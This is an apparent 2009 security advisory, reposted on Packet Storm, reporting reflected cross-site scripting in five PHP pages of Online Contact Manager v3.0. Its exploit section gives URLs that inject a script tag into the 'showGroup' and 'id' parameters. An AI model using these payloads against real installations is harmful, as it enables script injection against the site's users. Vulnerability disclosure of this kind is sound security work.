Online Contact Manager version 3.0 suffers from multiple cross site scripting vulnerabilities.
a9acd577c0d8a1e4ee4483594e0aa58c1d3e638f182ee8dba6f0f1d102861ec1 =========================================================================================
Title : Multiple Cross-site Scripting (XSS) Vulnerability
Software : Online Contact Manager v3.0
Vendor : www.esoftpro.com
Date : 19 April 2009
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : c0li.BlogSpot.Com
=========================================================================================
[-] Vulnerable
index.php
view.php
email.php
edit.php
delete.php
[-] Exploit
http://[site]/[path]/index.php?showGroup=+<script>alert(123)</script>
http://[site]/[path]/view.php?id=+<script>alert(123)</script>
http://[site]/[path]/email.php?id=+<script>alert(123)</script>
http://[site]/[path]/edit.php?id=+<script>alert(123)</script>
http://[site]/[path]/delete.php?id=+<script>alert(123)</script>
=========================================================================================
[-] Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh utk Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
=========================================================================================
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed